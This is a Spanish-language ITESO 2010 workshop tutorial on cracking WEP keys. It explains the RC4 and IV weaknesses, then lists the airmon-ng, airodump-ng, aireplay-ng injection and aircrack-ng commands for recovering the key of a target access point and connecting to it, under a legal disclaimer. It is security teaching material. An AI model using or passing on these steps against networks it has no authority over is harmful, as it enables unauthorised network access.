Sei sulla pagina 1di 8

Ingeniería en Redes y Telecomunicaciones

Talleres de verano ITESO 2010

Como obtener claves WEP


Introducción

WEP, es el acrónimo de Wired Equivalent Privacy y esto es un sistema de cifrado incluido


en el estándar 802.11 como protocolo para redes Wireless que permite cifrar la
información que se transmite. Está basado en el algoritmo de encriptación RC4, y utiliza
claves de 64bits, de 128bits o de 256bits. Es inseguro debido a su arquitectura, por lo que
el aumentar los tamaños de las claves de encriptación sólo aumenta el tiempo necesario
para romperlo.

Sin embargo a pesar de que el WEP es bastante utilizado no resulta muy difícil de
crackear, para ello se suelen utilizar los llamados Packet sniffers y los WEP Crackers.

Lógica del proceso

Lo que se hace es capturar la cantidad de paquetes necesaria (dependerá del numero de


bits de cifrado) mediante la utilización de un Packet sniffer y luego mediante un WEP
cracker o key cracker se trata de “romper” el cifrado de la red. Un key cracker
simplemente es un programa que generalmente se basa en ingeniería inversa y lo que
hace es procesar los paquetes capturados para descifrar la clave WEP.

Esto es posible debido a que el cifrado WEP utiliza el algoritmo de encriptación RC4
(Algoritmo de cifrado de flujo, es decir que funciona expandiendo una clave secreta o
“seed” la cual es un generador de números casi aleatorios). Siguiendo las principales
vulnerabilidades que afectan a este algoritmo proporcionado por RSA Security es posible
reducir su potencia de 128 bits de cifrado a tan solo 24 bits. Lo que conlleva una
disminución importante de la seguridad (de 2^104-1 a 2^24-1). Además se usa un vector de
inicialización (conocido como IV de 24 bits) la cual se añade a la “seed” mencionada
antes, y cambia para cada trama.

El receptor usa el mismo IV para chequear la integridad del mensaje. Los IVS son públicos
(no cifrados, en texto plano, o sea legibles), y aparecen en los paquetes transmitidos por
la red. Como ya he dicho varían, el problema es que la máquina suele reutilizar IVS. El
tamaño de la clave no es la limitación principal de la seguridad en WEP.

Este tutorial será útil para personas con poca o ninguna experiencia en el uso de Linux y
de herramientas de inyección de paquetes. Para esto usaremos la distribución de Linux
llamada “BackTrack”, ya que incluye herramientas muy eficientes y fáciles de utilizar.

ITESO - Departamento de Electrónica Sistemas e Informática


Humberto Barba G. - flamon@iteso.mx
Ingeniería en Redes y Telecomunicaciones
Talleres de verano ITESO 2010

Herramientas requeridas

• Computadora con tarjeta inalámbrica para inyección de paquetes (Realtek RTL8187,


Intel Pro Wireless 3945, etc.)

• LiveDVD de BackTrack el cual se puede descargar de:


http://www.backtrack-linux.org/downloads/

BackTrack es un DVD que se puede arrancar prácticamente en cualquier computadora


con lector de DVD, incluye los controladores necesarios para las tarjetas de inyección de
paquetes más utilizadas en el mercado.

Glosario de términos

• AP: Es el punto de acceso inalámbrico del cual obtendremos la contraseña y nos


conectaremos posteriormente.

• MAC Address: Es una dirección única de control de acceso al medio, la cual la


tienen todos los dispositivos que se conectan en red. Se encuentra en un formato
hexadecimal (p. ej. 00:11:22:33:44:55)

• BSSID: Es la dirección MAC del punto de acceso

• ESSID: Se refiere al nombre del punto de acceso. (p. ej. linksys, default, belkin,
INFINITUMXXXX, etc)

• TERMINAL: Es la línea de comandos en Linux, similar a MS-DOS

• WEP: acrónimo de “Wired Equivalency Privacy”, y es la herramienta de seguridad


más utilizada para redes inalámbricas

Advertencia

INGRESAR A REDES INALÁMBRICAS DE FORMA NO AUTORIZADA PUEDE SER


PENALIZADO POR LA LEY. ESTE MANUAL ESTÁ HECHO CON FINES EDUCATIVOS
PARA FACILITAR EL APRENDIZAJE SOBRE SEGURIDAD DE LAS REDES INALÁMBRICAS,
EL USO INDEBIDO DE ESTA INFORMACIÓN ES RESPONSABILIDAD DE QUIEN LA
UTILIZA PARA LOS FINES QUE DESEE. EL AUTOR DE ESTE MATERIAL Y LA
INSTITUCIÓN DONDE SE IMPARTE ESTE CURSO SE DESLINDA DE TODA
RESPONSABILIDAD LEGAL SOBRE EL MAL USO QUE SE LE PUEDA DAR A ESTE
TUTORIAL.

ITESO - Departamento de Electrónica Sistemas e Informática


Humberto Barba G. - flamon@iteso.mx
Ingeniería en Redes y Telecomunicaciones
Talleres de verano ITESO 2010

Implementación

Se recomienda antes de arrancar el LiveDVD de BackTrack conocer el canal en el cual está


transmitiendo el Access Point del cual queremos conocer su contraseña WEP, para ello se
puede utilizar un software como el NetStumbler el cual se puede descargar de:
http://www.netstumbler.com/downloads/
Además también será necesario conocer la dirección MAC (dirección física) de nuestra
tarjeta de red inalámbrica, la cual se puede averiguar tecleando en CMD el
comando ipconfig /all será necesario tenerla a la mano para los siguientes pasos.

Inserte el LiveDVD de BackTrack en su unidad de DVD y arranque desde dicha unidad.


Probablemente necesite hacer cambios en el BIOS de su computadora para que la primera
unidad que arranque sea el DVD. Una vez que inicie sesión en Linux, deberá escribir el
comando startx para iniciar la interfaz gráfica de BackTrack.

Una vez estando dentro de Backtrack tendrá una apariencia gráfica similar a Windows,
deberá hacer clic en icono con una pantallita negra situado en la parte inferior izquierda
de su pantalla, para abrir la Terminal

Una vez hecho clic, se abrirá una ventana de Terminal y se deberá teclear el
comando iwconfig y dar Enter para ver las interfaces de red que tenemos en nuestra
computadora. Deberá aparecer una tarjeta llamada “wlan0” como en la siguiente imagen:

ITESO - Departamento de Electrónica Sistemas e Informática


Humberto Barba G. - flamon@iteso.mx
Ingeniería en Redes y Telecomunicaciones
Talleres de verano ITESO 2010

En seguida deberá teclear el siguiente comando: airmon-ng start wlan0 [CANAL] donde
canal se refiere al canal en el cual está transmitiendo el Access Point del cual queremos
saber su contraseña. En la siguiente imagen utilizamos el canal 6 para fines de
demostración:

ITESO - Departamento de Electrónica Sistemas e Informática


Humberto Barba G. - flamon@iteso.mx
Ingeniería en Redes y Telecomunicaciones
Talleres de verano ITESO 2010

Al hacer eso se nos va a crear una nueva interface llamada mon0 en la misma ventana de
Terminal o en una nueva deberemos teclear lo siguiente: airodump-ng -w [ARCHIVO] -a
-c[CANAL ] mon0 en el cual archivo será el nombre del archivo que crearemos y canal
será el mismo que pusimos en el paso anterior (en el cual esta transmitiendo el AP). Para
fines de demostración se tecleó el comando: airodump-ng -w /root/captura -a -c6 mon0 y
el archivo se creó en el escritorio:

Una vez hecho esto se comienzan a guardar la información que el Access Point transmite.

Para el siguiente paso se tiene que abrir una nueva ventana de Terminal y se debe teclear
lo siguiente aireplay-ng -1 30 -e [ESSID] -a [BSSID] -h [MAC DE SU TARJETA DE RED ]
mon0 en el cual se pone el nombre de la red a escuchar, su dirección MAC y la dirección
MAC de nuestra tarjeta. Para fines de demostración se escribió lo siguiente: aireplay-ng -1
30 -e INFINITUM2402 -a 001495EB2F09 -h 00212F2DCCDA mon0 como lo muestra esta
imagen:

ITESO - Departamento de Electrónica Sistemas e Informática


Humberto Barba G. - flamon@iteso.mx
Ingeniería en Redes y Telecomunicaciones
Talleres de verano ITESO 2010

Este proceso ayudará a asociar nuestra tarjeta inalámbrica con el Access Point del cual
queremos obtener su contraseña.

Ahora necesitamos inyectar tráfico al Access Point, lo cual se hace tecleando en una
nueva ventana de Terminal: aireplay-ng -3 -x600 -b [BSSID] -h [MAC DE SU TARJETA
DE RED] mon0 y el cual en nuestro caso fue el comando siguiente: aireplay-ng -3 -x600
-b 001495EB2F09 -h 00212F2DCCDA mon0 como lo muestra la imagen:

ITESO - Departamento de Electrónica Sistemas e Informática


Humberto Barba G. - flamon@iteso.mx
Ingeniería en Redes y Telecomunicaciones
Talleres de verano ITESO 2010

Una vez hecho esto, se comienzan a inyectar paquetes, lo único necesario ahora es dejarlo
para que llegue a un numero grande de IVs, se recomienda sean más de 60000, por lo
que debemos esperar 1 o 2 minutos en lo que los programas realizan todo este proceso.

Por último para obtener la contraseña debemos abrir una nueva Terminal y escribir el
siguiente comando aircrack-ng [RUTA DEL ARCHIVO-01.cap] el cual en nuestro caso
fue aircrack-ng /root/captura-01.cap como se puede apreciar en la imagen:

CON ÉSTE ÚLTIMO PASO NOS ARROJA LA CONTRASEÑA EN FORMATO


HEXADECIMAL, LA CUAL DEBEMOS SIMPLEMENTE ANOTAR O MEMORIZAR
(OMITIREMOS LOS DOS PUNTOS QUE APARECEN CADA DOS CARACTERES), PARA
TENERLA DISPONIBLE CUANDO NOS INTENTEMOS CONECTAR A DICHO ACCESS
POINT.

ITESO - Departamento de Electrónica Sistemas e Informática


Humberto Barba G. - flamon@iteso.mx
Ingeniería en Redes y Telecomunicaciones
Talleres de verano ITESO 2010

En resumen

Los pasos para encontrar una clave WEP de un punto de acceso inalámbrico son los
siguientes:

1. Abrir una Terminal y teclear: airmon-ng start wlan0 [CANAL]

2. En Terminal teclear: airodump-ng -w [ARCHIVO] -a -c[CANAL] mon0

3. Abrir una Terminal y teclear: aireplay-ng -1 30 -e [ESSID ] -a [BSSID ] -h [MAC DE


SU TARJETA DE RED] mon0

4. Abrir una Terminal y teclear: aireplay-ng -3 -x600 -b [ BSSID ] -h [MAC DE SU


TARJETA DE RED] mon0

5. Abrir una Terminal y teclear: aircrack-ng [ RUTA DEL ARCHIVO-01.cap]

Lo cual con algo de práctica, este procedimiento no nos deberá de llevar más de 5
minutos, siempre y cuando el punto de acceso tenga un tráfico de paquetes relativamente
constante.

Referencias

El rincón del Wi-Fi. (s. f.). CRACKEAR WEP. Recuperado el 22 de mayo de 2010, de:
http://www.freewebs.com/thebyber/crackearwep.htm

NotiTek. (s. f.). WEP. Recuperado el 22 de mayo de 2010, de:


http://www.notitek.com.ar/wep

UNDERDOWN, Ryan. (12 de Febrero de 2007). CRACKING WEP USING BACKTRACK:


A BEGINNER'S GUIDE. Recuperado el 22 de mayo de 2010, de:
http://ryanunderdown.com/linux/cracking-wep-using-backtrack.php

ITESO - Departamento de Electrónica Sistemas e Informática


Humberto Barba G. - flamon@iteso.mx

Potrebbero piacerti anche